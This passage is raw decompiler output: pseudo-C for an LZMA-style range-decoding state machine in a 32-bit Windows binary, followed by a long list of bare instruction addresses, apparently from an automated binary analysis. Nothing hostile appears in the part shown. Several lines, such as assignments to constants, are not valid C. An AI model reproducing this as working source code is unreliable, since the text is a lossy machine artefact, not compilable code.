							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                  0x00000000
                  0x00406398
                  0x00406398
                  0x0040639c
                  0x00406453
                  0x00406456
                  0x00406462
                  0x00406343
                  0x00406343
                  0x00406346
                  0x004066b8
                  0x004066b8
                  0x004066bb
                  0x004066bb
                  0x004066c1
                  0x004066c7
                  0x004066cd
                  0x004066e7
                  0x004066ea
                  0x004066f0
                  0x004066fb
                  0x004066fd
                  0x004066cf
                  0x004066cf
                  0x004066de
                  0x004066e2
                  0x004066e2
                  0x00406707
                  0x0040672e
                  0x0040672e
                  0x00406734
                  0x00406734
                  0x00000000
                  0x00406709
                  0x00406709
                  0x0040670d
                  0x004068bc
                  0x00000000
                  0x004068bc
                  0x00406719
                  0x00406720
                  0x00406728
                  0x0040672b
                  0x00000000
                  0x0040672b
                  0x004063a2
                  0x004063a6
                  0x004068e7
                  0x004068e7
                  0x004068ea
                  0x004068ee
                  0x004068ee
                  0x004063ac
                  0x004063b2
                  0x004063b5
                  0x004063b9
                  0x004063bc
                  0x004063c0
                  0x00406886
                  0x004068d2
                  0x004068da
                  0x004068e1
                  0x004068e3
                  0x00000000
                  0x004068e3
                  0x004063c6
                  0x004063c9
                  0x004063cf
                  0x004063d1
                  0x004063d1
                  0x004063d4
                  0x004063d7
                  0x004063da
                  0x004063dd
                  0x004063e0
                  0x004063e3
                  0x004063e4
                  0x004063e6
                  0x004063e6
                  0x004063e6
                  0x004063e9
                  0x004063ec
                  0x004063ef
                  0x004063f2
                  0x004063f2
                  0x004063f5
                  0x004063f7
                  0x004063f7
                  0x004063fa
                  0x004063fa
                  0x004063fa
                  0x00405ed0
                  0x00405ed0
                  0x00405ed9
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x00000000
                  0x00405eea
                  0x00000000
                  0x00000000
                  0x00405ef3
                  0x00405ef6
                  0x00405ef9
                  0x00405efd
                  0x00000000
                  0x00000000
                  0x00405f03
                  0x00405f06
                  0x00405f08
                  0x00405f09
                  0x00405f0c
                  0x00405f0e
                  0x00405f0f
                  0x00405f11
                  0x00405f14
                  0x00405f19
                  0x00405f1e
                  0x00405f27
                  0x00405f3a
                  0x00405f3d
                  0x00405f49
                  0x00405f71
                  0x00405f73
                  0x00405f81
                  0x00405f81
                  0x00405f85
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405f75
                  0x00405f75
                  0x00405f78
                  0x00405f79
                  0x00405f79
                  0x00000000
                  0x00405f75
                  0x00405f4f
                  0x00405f54
                  0x00405f54
                  0x00405f5d
                  0x00405f65
                  0x00405f68
                  0x00000000
                  0x00405f6e
                  0x00405f6e
                  0x00000000
                  0x00405f6e
                  0x00000000
                  0x00405f8b
                  0x00405f8b
                  0x00405f8f
                  0x0040683b
                  0x00000000
                  0x0040683b
                  0x00405f98
                  0x00405fa8
                  0x00405fab
                  0x00405fae
                  0x00405fae
                  0x00405fae
                  0x00405fb1
                  0x00405fb5
                  0x00000000
                  0x00000000
                  0x00405fb7
                  0x00405fbd
                  0x00405fe7
                  0x00405fed
                  0x00405ff4
                  0x00000000
                  0x00405ff4
                  0x00405fc3
                  0x00405fc6
                  0x00405fcb
                  0x00405fcb
                  0x00405fd6
                  0x00405fde
                  0x00405fe1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406026
                  0x0040602c
                  0x0040602f
                  0x0040603c
                  0x00406044
                  0x00000000
                  0x00000000
                  0x00405ffb
                  0x00405ffb
                  0x00405fff
                  0x0040684a
                  0x00000000
                  0x0040684a
                  0x0040600b
                  0x00406016
                  0x00406016
                  0x00406016
                  0x00406019
                  0x0040601c
                  0x0040601f
                  0x00406024
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040604c
                  0x0040604e
                  0x00406051
                  0x004060c2
                  0x004060c5
                  0x004060c8
                  0x004060cf
                  0x004060d9
                  0x00000000
                  0x004060d9
                  0x00406053
                  0x00406057
                  0x0040605a
                  0x0040605c
                  0x0040605f
                  0x00406062
                  0x00406064
                  0x00406067
                  0x00406069
                  0x0040606e
                  0x00406071
                  0x00406074
                  0x00406078
                  0x0040607f
                  0x00406082
                  0x00406089
                  0x0040608d
                  0x00406095
                  0x00406095
                  0x00406095
                  0x0040608f
                  0x0040608f
                  0x0040608f
                  0x00406084
                  0x00406084
                  0x00406084
                  0x00406099
                  0x0040609c
                  0x004060ba
                  0x004060bc
                  0x00000000
                  0x0040609e
                  0x0040609e
                  0x004060a1
                  0x004060a4
                  0x004060a7
                  0x004060a9
                  0x004060a9
                  0x004060a9
                  0x004060ac
                  0x004060af
                  0x004060b1
                  0x004060b2
                  0x004060b5
                  0x00000000
                  0x004060b5
                  0x00000000
                  0x004062eb
                  0x004062ef
                  0x0040630d
                  0x00406310
                  0x00406317
                  0x0040631a
                  0x0040631d
                  0x00406320
                  0x00406323
                  0x00406326
                  0x00406328
                  0x0040632f
                  0x00406330
                  0x00406332
                  0x00406335
                  0x00406338
                  0x0040633b
                  0x0040633b
                  0x00406340
                  0x00000000
                  0x00406340
                  0x004062f1
                  0x004062f4
                  0x004062f7
                  0x00406301
                  0x00000000
                  0x00000000
                  0x00406355
                  0x00406359
                  0x0040637c
                  0x0040637f
                  0x00406382
                  0x0040638c
                  0x0040635b
                  0x0040635b
                  0x0040635e
                  0x00406361
                  0x00406364
                  0x00406371
                  0x00406374
                  0x00406374
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406409
                  0x0040640d
                  0x00406414
                  0x00406417
                  0x0040641a
                  0x00406424
                  0x00000000
                  0x00406424
                  0x0040640f
                  0x00000000
                  0x00000000
                  0x00406430
                  0x00406434
                  0x0040643b
                  0x0040643e
                  0x00406441
                  0x00406436
                  0x00406436
                  0x00406436
                  0x00406444
                  0x00406447
                  0x0040644a
                  0x0040644a
                  0x0040644d
                  0x00406450
                  0x00000000
                  0x00000000
                  0x004064f0
                  0x004064f0
                  0x004064f4
                  0x00406892
                  0x00000000
                  0x00406892
                  0x004064fa
                  0x004064fd
                  0x00406500
                  0x00406504
                  0x00406507
                  0x0040650d
                  0x0040650f
                  0x0040650f
                  0x0040650f
                  0x00406512
                  0x00406515
                  0x00000000
                  0x00000000
                  0x004060e5
                  0x004060e5
                  0x004060e9
                  0x00406856
                  0x00000000
                  0x00406856
                  0x004060ef
                  0x004060f2
                  0x004060f5
                  0x004060f9
                  0x004060fc
                  0x00406102
                  0x00406104
                  0x00406104
                  0x00406104
                  0x00406107
                  0x0040610a
                  0x0040610a
                  0x0040610d
                  0x00406110
                  0x00000000
                  0x00000000
                  0x00406116
                  0x0040611c
                  0x00000000
                  0x00000000
                  0x00406122
                  0x00406122
                  0x00406126
                  0x00406129
                  0x0040612c
                  0x0040612f
                  0x00406132
                  0x00406133
                  0x00406136
                  0x00406138
                  0x0040613e
                  0x00406141
                  0x00406144
                  0x00406147
                  0x0040614a
                  0x0040614d
                  0x00406150
                  0x0040616c
                  0x0040616f
                  0x00406172
                  0x00406175
                  0x0040617c
                  0x00406180
                  0x00406182
                  0x00406186
                  0x00406152
                  0x00406152
                  0x00406156
                  0x0040615e
                  0x00406163
                  0x00406165
                  0x00406167
                  0x00406167
                  0x00406189
                  0x00406190
                  0x00406193
                  0x00000000
                  0x00406199
                  0x00000000
                  0x00406199
                  0x00000000
                  0x0040619e
                  0x0040619e
                  0x004061a2
                  0x00406862
                  0x00000000
                  0x00406862
                  0x004061a8
                  0x004061ab
                  0x004061ae
                  0x004061b2
                  0x004061b5
                  0x004061bb
                  0x004061bd
                  0x004061bd
                  0x004061bd
                  0x004061c0
                  0x004061c3
                  0x004061c3
                  0x004061c3
                  0x004061c9
                  0x00000000
                  0x00000000
                  0x004061cb
                  0x004061ce
                  0x004061d1
                  0x004061d4
                  0x004061d7
                  0x004061da
                  0x004061dd
                  0x004061e0
                  0x004061e3
                  0x004061e6
                  0x004061e9
                  0x00406201
                  0x00406204
                  0x00406207
                  0x0040620a
                  0x0040620a
                  0x0040620d
                  0x00406211
                  0x00406213
                  0x004061eb
                  0x004061eb
                  0x004061f3
                  0x004061f8
                  0x004061fa
                  0x004061fc
                  0x004061fc
                  0x00406216
                  0x0040621d
                  0x00406220
                  0x00000000
                  0x00406222
                  0x00000000
                  0x00406222
                  0x00406220
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00000000
                  0x00000000
                  0x00406262
                  0x00406262
                  0x00406266
                  0x0040686e
                  0x00000000
                  0x0040686e
                  0x0040626c
                  0x0040626f
                  0x00406272
                  0x00406276
                  0x00406279
                  0x0040627f
                  0x00406281
                  0x00406281
                  0x00406281
                  0x00406284
                  0x00406287
                  0x00406287
                  0x0040628d
                  0x0040622b
                  0x0040622b
                  0x0040622e
                  0x00000000
                  0x0040622e
                  0x0040628f
                  0x0040628f
                  0x00406292
                  0x00406295
                  0x00406298
                  0x0040629b
                  0x0040629e
                  0x004062a1
                  0x004062a4
                  0x004062a7
                  0x004062aa
                  0x004062ad
                  0x004062c5
                  0x004062c8
                  0x004062cb
                  0x004062ce
                  0x004062ce
                  0x004062d1
                  0x004062d5
                  0x004062d7
                  0x004062af
                  0x004062af
                  0x004062b7
                  0x004062bc
                  0x004062be
                  0x004062c0
                  0x004062c0
                  0x004062da
                  0x004062e1
                  0x004062e4
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x00406573
                  0x00406573
                  0x00406577
                  0x0040689e
                  0x00000000
